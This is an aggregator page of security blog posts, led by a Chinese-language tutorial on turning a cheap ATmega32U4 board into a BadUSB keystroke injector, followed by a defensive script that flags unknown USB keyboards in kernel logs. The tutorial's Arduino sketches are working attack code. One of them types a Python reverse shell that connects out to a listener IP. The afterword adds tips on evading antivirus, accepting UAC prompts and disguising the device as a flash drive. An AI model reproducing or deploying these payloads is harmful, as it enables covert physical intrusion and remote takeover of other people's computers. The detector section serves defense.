Aggregator
Galaxy Leapfrogging: Pwning the Galaxy S8
5 years 5 months ago
flanker017
Playing with BadUSB
5 years 5 months ago
Preface
The board is a Beetle USB (ATmega32U4).
It has a built-in USB connector and is fairly cheap. I had looked at several BadUSB boards before but gave up on them because they were expensive, until two days ago when hx mentioned that this board works too, so I ordered one right away.
Select Arduino Leonardo as the board type, then compile and upload.
The starter code is very simple and self-explanatory.

Windows: pop a calculator

```cpp
#include <Keyboard.h>

void setup() {
  Keyboard.begin();
  delay(2000);                    // give the host time to enumerate the new HID keyboard
  Keyboard.press(KEY_LEFT_GUI);   // Win+R opens the Run dialog
  delay(50);
  Keyboard.press('r');
  delay(50);
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(50);
  Keyboard.println("calc");       // println types the text and then sends Enter
  delay(50);
  Keyboard.press(KEY_RETURN);     // redundant after println, kept as in the original sketch
  Keyboard.release(KEY_RETURN);
  delay(50);
}

void loop() {
  // nothing to do: the payload runs once in setup()
}
```

Ubuntu: open a terminal

```cpp
#include <Keyboard.h>

void setup() {
  Keyboard.begin();
  delay(2000);                    // wait for enumeration
  /* Alternative: Ctrl+Alt+T. Note that 'T' sends Shift+t, so a lowercase 't'
     would be needed here, and the modifiers should be released afterwards
     (Keyboard.releaseAll()).
  Keyboard.press(KEY_LEFT_CTRL);
  delay(500);
  Keyboard.press(KEY_LEFT_ALT);
  delay(500);
  Keyboard.press('T');
  delay(500);
  Keyboard.release('T');
  */
  Keyboard.press(KEY_LEFT_GUI);   // the Super key opens the GNOME activities search
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);
  delay(500);
  Keyboard.println("term");       // type "term" + Enter to launch the terminal
  delay(500);
  Keyboard.press(KEY_RETURN);
  delay(500);
  Keyboard.release(KEY_RETURN);
  Keyboard.println("echo hacked");
  delay(500);
  Keyboard.press(KEY_RETURN);
  delay(500);
  Keyboard.release(KEY_RETURN);
  delay(50);
}

void loop() {
  // nothing to do: the payload runs once in setup()
}
```

Ubuntu reverse shell

```cpp
#include <Keyboard.h>

void setup() {
  Keyboard.begin();
  delay(2000);                    // wait for enumeration
  /* Alternative: Ctrl+Alt+T (see the note in the previous sketch).
  Keyboard.press(KEY_LEFT_CTRL);
  delay(500);
  Keyboard.press(KEY_LEFT_ALT);
  delay(500);
  Keyboard.press('T');
  delay(500);
  Keyboard.release('T');
  */
  Keyboard.press(KEY_LEFT_GUI);   // open the activities search and launch a terminal
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);
  delay(500);
  Keyboard.println("term");
  delay(500);
  Keyboard.press(KEY_RETURN);
  delay(500);
  Keyboard.release(KEY_RETURN);
  // Type a Python reverse shell that connects back to the listener at 10.10.10.30:8800
  // (the author's listener address; the inner double quotes are escaped for the C string).
  Keyboard.println("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.10.30\",8800));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);' ");
  delay(500);
  Keyboard.press(KEY_RETURN);
  delay(500);
  Keyboard.release(KEY_RETURN);
  delay(50);
}

void loop() {
  // nothing to do: the payload runs once in setup()
}
```

Afterword
The code is extremely simple and its execution is not stealthy at all; the hard part is getting the finished board plugged into the target device :)
It emulates a keyboard device. I tried it on five machines, three Windows 10 boxes with antivirus installed and two Ubuntu boxes, and it ran normally on all of them without being intercepted.
Malicious commands might be intercepted; Huorong seems to block command-line commands that create users.
Using the board to emulate keyboard operations to turn off the antivirus should also be possible :) but for now I have not figured out how to close the antivirus with keyboard shortcuts. Simulating clicks on "allow this program to run" or accepting the UAC prompt during execution may also be possible.
On Taobao some versions of this board come with a case and look like an ordinary USB flash drive. That would probably be better for real-world use.
Les1ie
2019-08-07 09:35:43
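The post above says the board simply shows up as a keyboard, which is also what a defender on the host can see. The following is an added example, not code from the original post: it scans Linux kernel log lines for keyboard interfaces and flags any that come from a development-board vendor or are not in a known-keyboard inventory. The log lines are constructed for this example; 2341:8036 is the VID:PID an Arduino Leonardo-compatible board presents when flashed with the Keyboard library, and the vendor list is an assumption meant to be tuned per environment.

```python
"""Flag suspicious USB HID keyboards in Linux kernel log lines.

Added example (not from the original post). A board programmed with the
Arduino Keyboard library enumerates as an ordinary HID keyboard, so the
host-side signal is: a new keyboard appeared, from a vendor that makes
development boards, and it is not one we already know.
"""
import re
from dataclasses import dataclass
from typing import Collection, List, Tuple

# Constructed sample log lines (dmesg style); not captured from a real machine.
SAMPLE_LOG = """\
[    2.501] hid-generic 0003:046D:C31C.0001: input,hidraw0: USB HID v1.10 Keyboard [Logitech USB Keyboard] on usb-0000:00:14.0-1/input0
[ 1203.114] usb 1-2: new full-speed USB device number 7 using xhci_hcd
[ 1203.270] usb 1-2: New USB device found, idVendor=2341, idProduct=8036, bcdDevice= 1.00
[ 1203.270] usb 1-2: Product: Arduino Leonardo
[ 1203.292] input: Arduino LLC Arduino Leonardo as /devices/pci0000:00/0000:00:14.0/usb1/1-2/1-2:1.2/0003:2341:8036.0005/input/input23
[ 1203.350] hid-generic 0003:2341:8036.0005: input,hidraw2: USB HID v1.01 Keyboard [Arduino LLC Arduino Leonardo] on usb-0000:00:14.0-2/input2
[ 1203.351] hid-generic 0003:2341:8036.0006: input,hidraw3: USB HID v1.01 Mouse [Arduino LLC Arduino Leonardo] on usb-0000:00:14.0-2/input2
[ 1890.120] usb 1-3: New USB device found, idVendor=0781, idProduct=5567, bcdDevice= 1.00
[ 1890.200] usb-storage 1-3:1.0: USB Mass Storage device detected
"""

# hid-generic lines carry bus:VID:PID and the HID usage ("Keyboard", "Mouse", ...).
HID_LINE = re.compile(
    r"hid-generic [0-9A-Fa-f]{4}:(?P<vid>[0-9A-Fa-f]{4}):(?P<pid>[0-9A-Fa-f]{4})\.\d+: "
    r".*USB HID v[\d.]+ (?P<kind>\w+) \[(?P<name>[^\]]*)\]"
)

# Vendors whose boards are commonly flashed as keystroke injectors.
# Assumption: a starting list to be tuned per environment, not an authoritative one.
DEV_BOARD_VENDORS = {
    "2341": "Arduino",
    "16c0": "Van Ooijen (Teensy)",
}


@dataclass
class Finding:
    vid: str
    pid: str
    name: str
    reasons: List[str]


def scan_kernel_log(text: str, known_keyboards: Collection[Tuple[str, str]] = ()) -> List[Finding]:
    """Return one Finding per keyboard interface that looks out of place.

    known_keyboards is the inventory of lowercase (vid, pid) pairs allowed to
    appear as keyboards. Anything else is reported, and keyboards from
    dev-board vendors are reported even when they are inventoried.
    """
    findings: List[Finding] = []
    for line in text.splitlines():
        m = HID_LINE.search(line)
        if not m or m.group("kind") != "Keyboard":
            continue  # mice, joysticks etc. cannot inject keystrokes
        vid, pid = m.group("vid").lower(), m.group("pid").lower()
        reasons = []
        if vid in DEV_BOARD_VENDORS:
            reasons.append(f"keyboard from dev-board vendor {DEV_BOARD_VENDORS[vid]}")
        if (vid, pid) not in known_keyboards:
            reasons.append("keyboard not in inventory")
        if reasons:
            findings.append(Finding(vid, pid, m.group("name"), reasons))
    return findings


if __name__ == "__main__":
    inventory = {("046d", "c31c")}  # the Logitech keyboard is the only known one
    for f in scan_kernel_log(SAMPLE_LOG, inventory):
        print(f"{f.vid}:{f.pid} {f.name!r}: " + "; ".join(f.reasons))
```

Run against the sample, only the Leonardo's keyboard interface is reported; its mouse interface and the Logitech keyboard in the inventory are not. The vendor check is the weaker of the two signals: the VID and PID live in the board's USB descriptors and can be changed when the sketch is built, so the inventory match is the one to rely on. In production the same allow-list is enforced before the kernel binds the device by a tool such as USBGuard rather than by reading logs after the fact.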
Shared images
5 years 5 months ago
How the browser parses JS - bamb00
5 years 5 months ago
Steps a web page takes to load JS: 1. The browser starts parsing the HTML while it is still downloading it (it does not wait for the download to finish). 2. When it encounters a <script> tag it pauses parsing and hands control of page rendering to the JavaScript engine. 3. If the <script> tag references an external script, that script is downloaded first and then executed; otherwise it is executed directly. 4. When execution finishes, control is handed back to the rendering engine, which continues parsing the HTML. Note: there
bamb00
The Hunt for IoT: So Easy To Compromise, Children Are Doing It
5 years 5 months ago
This episode in The Hunt for IoT Volume 6 series focuses on the threat actors building IoT botnets, how easy IoT devices are to exploit, recent thingbot discoveries, and the status of Mirai infections worldwide.
Hash length extension attack: De1CTF - SSRF Me - PaperPen
5 years 5 months ago
My first hash length extension attack challenge; writing it down for the record.
PaperPen
Make the terminal look better: Ubuntu Oh My Zsh setup guide - luoyesiqiu
5 years 5 months ago
List the available shells; if zsh is not there, install it. Install zsh. Set the default shell. Reboot the host. Check the current default shell to confirm zsh is the default. Install oh my zsh. Install the zsh-syntax-highlighting plugin. Install fonts: oh my zsh uses many symbols to decorate the terminal, so install some fonts that support a variety
luoyesiqiu
IOMMU introduction
5 years 5 months ago
Terenceli
A command-execution vulnerability seen through an ICS router firmware reversing challenge - H4lo
5 years 5 months ago
Preface: a firmware reversing challenge from the first round of the 2019 ICS security competition. It seemed fairly easy, and many people solved it. Here I reproduce this command-execution bug using both static analysis and dynamic debugging. Challenge description: the scenario given is quite realistic: the router has a command injection when handling the TDDP protocol, which leads to remote command execution. It is just that no matter how I formatted the answer I worked out afterwards, the submission was rejected...
H4lo
Specification of intent arguments - bamb00
5 years 5 months ago
For Activity Manager commands that take an intent argument, you can specify the intent with the following options:
bamb00
Kazakhstan Attempts to MITM Its Citizens
5 years 5 months ago
Kazakhstan is now asking its citizens to install digital certificates so that it can decrypt all online communications. Their methods, however, may leave the population vulnerable to cyber attacks for many years to come.
Analysis of Xposed's field reflection flow - luoyesiqiu
5 years 5 months ago
In the "XposedBridge source", the field reflection methods are wrapped in the  class. Let's look at how Xposed gets and sets field values. Getting a field's value: there are many methods for this, some for fields of primitive type (getIntField, getLongField, getDoubleField...) and some for fields of object type
luoyesiqiu
MLSRC meets you at the 4th SSC Security Summit
5 years 5 months ago
Vulnerabilities, Exploits, and Malware Driving Attack Campaigns in June 2019
5 years 5 months ago
Similar to April and May, threat actors in June continued targeting the deserialization vulnerabilities found in Oracle WebLogic to mine cryptocurrency.
Learning PHP extensions
5 years 5 months ago
PHP, like Python, runs on an interpreter; PHP's is called Zend and Python's is CPython.
These are the official implementations; Python also has Jython, PyPy and the like, interpreters written in other languages.
Having room makes it big; those that haven't died just aren't big enough yet; not going to talk about Xiaohongshu
5 years 5 months ago
Not going to talk about Xiaohongshu, for no reason other than: having room makes one great~
Diversity of Thought in Tech
5 years 5 months ago
At Akamai, we believe innovation is only possible when the various viewpoints and experiences of a collective culminate to make a great idea. It is the variety of these ideas which is important. Why does diversity of thought matter? When...
Akamai
Intelligent security tools: are they a smart choice for you?
5 years 5 months ago
What you need to know before buying artificially intelligent security products
Criminals Using Targeted Remote File Inclusion Attacks in Phishing Campaigns
5 years 5 months ago
In June 2019, logs on my personal website recorded markers that were clearly Remote File Inclusion (RFI) vulnerability attempts. The investigation into the attempts uncovered a campaign of targeted RFI attacks that currently are being leveraged to deploy phishing kits....
Larry Cashdollar